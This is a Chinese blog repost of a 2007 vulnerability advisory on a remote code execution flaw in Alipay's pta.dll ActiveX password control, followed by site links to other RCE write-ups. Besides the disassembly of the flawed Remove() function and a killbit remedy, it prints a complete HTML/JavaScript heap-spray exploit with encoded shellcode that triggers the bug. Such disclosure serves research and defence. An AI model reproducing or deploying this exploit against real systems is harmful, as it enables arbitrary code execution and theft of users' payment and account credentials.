阿里巴巴支付宝远程代码执行漏洞-0DAY

最新推荐文章于 2024-06-07 11:05:12 发布
最新推荐文章于 2024-06-07 11:05:12 发布
阅读量299 收藏
点赞数
文章标签: javascript ViewUI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34122810/article/details/85186595
版权

阿里巴巴支付宝远程代码执行漏洞-0DAY


创建时间:2007-02-07
文章属性:原创
文章提交: cocoruder (frankruder_at_hotmail.com)

阿里巴巴支付宝远程代码执行漏洞

by cocoruder(frankruder_at_hotmail.com)
[url]http://ruder.cdut.net[/url]


Summary:

    支付宝是由阿里巴巴公司出品的在线支付解决方案,在中国拥有众多用户,更多信息请参考:

     [url]https://www.alipay.com[/url]

    在支付宝密码输入控件中存在一个远程代码执行漏洞,远程***者可利用此漏洞在被***者系统上执行任意代码,进而可安装***以及间谍程序,窃取相关敏感信息比如淘宝帐号/密码,或者支付宝帐号/密码。



Affected Software Versions:

    当前所有版本



Details:
    
    漏洞存在于由ActiveX控件"pta.dll"导出的"Remove()"函数中,相关信息如下:

    InprocServer32:    pta.dll
    ClassID      :     66F50F46-70A0-4A05-BD5E-FBCC0F9641EC

    [id(0x60030001), helpstring("method Remove")]
    void Remove([in] int idx);

    直接看Remove()函数的处理流程:

    .text:10003D4E ; Remove
    .text:10003D4E
    .text:10003D4E sub_10003D4E    proc near            ; DATA XREF: .rdata:1000B3A4o
    .text:10003D4E                            ; .rdata:1000B41Co ...
    .text:10003D4E
    .text:10003D4E arg_0           = dword ptr  4
    .text:10003D4E arg_4           = dword ptr  8
    .text:10003D4E
    .text:10003D4E                 mov     eax, [esp+arg_4]        
    .text:10003D52                 test    eax, eax
    .text:10003D54                 jl      short loc_10003D78    
    .text:10003D56                 push    esi
    .text:10003D57                 mov     esi, [esp+4+arg_0]    ; get idx
    .text:10003D5B                 shl     eax, 4            ; idx << 4
    .text:10003D5E                 add     eax, [esi+8]        ; [esi+8]=0
    .text:10003D61                 push    edi            ;
    .text:10003D62                 mov     edi, eax            ; idx << 4 ==>edi
    .text:10003D64                 mov     eax, [edi+8]        ; [(idx << 4)+8] ==>eax
    .text:10003D67                 push    eax
    .text:10003D68                 mov     ecx, [eax]        ; [[(idx << 4)+8]]==>ecx
    .text:10003D6A                 call    dword ptr [ecx+8]    ; [[[(idx << 4)+8]]+8]==>jmp addr
    .text:10003D6D                 push    edi
    .text:10003D6E                 lea     ecx, [esi+4]
    .text:10003D71                 call    sub_10003F35
    .text:10003D76                 pop     edi
    .text:10003D77                 pop     esi
    .text:10003D78
    .text:10003D78 loc_10003D78:                    ; CODE XREF: sub_10003D4E+6j
    .text:10003D78                 xor     eax, eax
    .text:10003D7A                 retn    8
    .text:10003D7A sub_10003D4E    endp


    idx是我们可以控制的,因此可以完成有意思的***,比如我们设置的idx为0x41414141,程序会执行[[[14141410h+8]]+8]地址的代码。


Solution:

    建议用户通过注册表对相应的CLSID设置Killbit,如不使用支付宝可到%system%\aliedit\目录下删除pta.dll



Disclosure Timeline:

    2007.02.07        发布公告



Attached File:

    这里给出一个用大内存分配实现的exp,把所有需访问其值的地址都置成0x0d0d0d0d,可以很好地达到***效果。
    警告:此exp只为展示此漏洞存在,请务用于其它用途。



/************************************************************************************************
Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
by cocoruder(frankruder_at_hotmail.com)
[url]http://ruder.cdut.net[/url]
*************************************************************************************************/

<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{66F50F46-70A0-4A05-BD5E-FBCC0F9641EC}"></OBJECT>
</head>
<body>

<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"+"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

    var heapBlockSize = 0x400000;

    var payLoadSize = payLoadCode.length * 2;

    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

    var spraySlide = unescape("%u0d0d%u0d0d");
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);

    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)
    {
        memory[i] = spraySlide + payLoadCode;
    }
    
    com.Remove(0x00d0d0d0);

    function getSpraySlide(spraySlide, spraySlideSize)
    {
        while (spraySlide.length*2<spraySlideSize)
        {
            spraySlide += spraySlide;
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2);
        return spraySlide;
    }

}
</script>
<button οnclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>



--EOF--
weixin_34122810
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NC Cloud blobRefClassSearch FastJson反序列化RCE漏洞复现
0xSec
07-13 646
用友 NC Cloud blobRefClassSearch 接口处存在FastJson反序列化漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
fastjson反序列化0day漏洞分析
bluemoon_0的博客
01-10 429
fastjson反序列化0day漏洞分析
Fastjson 漏洞分析
systemino的博客
07-14 4728
作者:icematcha@云影实验室 0x00前言 近日,Fastjson被传爆出新的“0day”,也引起了大家的高度关注。云影实验室第一时间进行了跟进和分析,通过分析我们发现,此次的漏洞并不算新的漏洞,其实官方早在去年五月就已经推出了相关补丁修复,但可能没有发布相关的安全通告,导致许多用户没有及时升级处理,而在此次护网中就谣传变成了现在的“0day”。PHP大马 此次漏洞利用的核心...
Apache OFBiz 路径遍历导致RCE漏洞
weixin_43167326的博客
06-05 617
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞
0day 云安宝云匣子fastjson远程代码执行漏洞(未公开)
weixin_43167326的博客
06-07 791
云安宝-云匣子是租户连接云资源的安全管理工具,帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。该系统ssoToolReport接口存在fastjson 漏洞执行任意系统命令。
Heap Spray原理浅析
Fly20141201. 的专栏
08-05 1928
Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在shellcode的前面加上大量的slide code(滑板指令),组成一个注入代码段。然后向系统申请大量内存,并且反复用注入代码段来填充。这样就使得进程的地址空间被大量的注入代码所占据。然后结合其他的漏洞攻击技
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令执行漏洞的成因是 Struts2 标签库中的 ...
2023-0Day漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
32、Metabase_validate远程命令执行 33、用友时空KSOA_imagefield_sql注入 34、宏景HCM_SQL注入 35、华天动力OA未授权访问及SQL注入 36、致远OA_Ajaxdo_upload 37、亿赛通电子文档安全管理系统命令执行
Blitz团队新挖到了一个0DAY漏洞
最新发布
07-26
0day漏洞复现
Fastjson存在0day漏洞
lyl_goahead的博客
03-28 1051
Fastjson的0day漏洞处理方法
漏洞预警 | Fastjson远程代码执行0day漏洞
07-25 1837
点击上方“程序IT圈”,选择“置顶公众号”每天早晨8点50分,第一时间送达!本文整理于阿里社区前段时间,阿里云云盾应急响应中心监测到FastJSON存在0day漏洞,攻击...
McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability
05-30 965
/* McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability Peel the frame from axis,Thanks Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15 Greetz to OYXin, sowhat, W
滑动验证插件 SlideVerify 的使用
热门推荐
yinge0508的博客
11-23 1万+
先看效果图: 源码地址:github文档地址:https://github.com/monoplasty/vue-monoplasty-slide-verify gitee镜像地址:https://gitee.com/monoplasty/vue-monoplasty-slide-verify 使用步骤:1,安装插件: npm install --save vue-monoplasty-slide-verify 2,在main.js中使用一下, importVuefrom'vue'...
Fastjson 爆出远程代码执行高危漏洞
金溪的博客
03-23 4195
fastjson近日曝出代码执行漏洞,恶意用户可利用此漏洞进行远程代码执行,入侵服务器,漏洞评级为“高危”。基本介绍fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。漏洞介绍fastjson在1.2.24以及之前版本近日曝出代码执行漏洞,当用户提交一个精心构造的恶意的序列化数据到服务器端时,fastjson在反序列化时存在漏洞,可导致远程...
绿盟科技网络安全攻防实验室安全研究员廖新喜:Java JSON 反序列化之殇
CSDN业界要闻
12-01 2146
11月18号,2017看雪安全开发者峰会在北京悠唐皇冠假日酒店举行。来自全国各地的开发人员、网络安全爱好者及相应领域顶尖专家,在2017看雪安全开发者峰会汇聚一堂,只为这场“安全与开发”的技术盛宴。随着REST API的流行,JSON的使用也越来越多,但其中存在的安全问题却不容忽视,特别是由于反序列化导致的远程代码执行更是威力十足。虽然反序列化漏洞出来已有一段时间,前期的一些防御方案随着时间的推移...
代码执行漏洞审计:0DAY挖掘与实战技巧
"0DAY挖掘巧思-代码执行漏洞审计-漏洞银行大咖面对面35-水清云影"是一场关于信息安全领域的技术直播讲座,由知名专家水清云影主讲。该讲座深入探讨了代码执行漏洞审计的重要性和实践技巧。讲座内容主要包括以下几...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值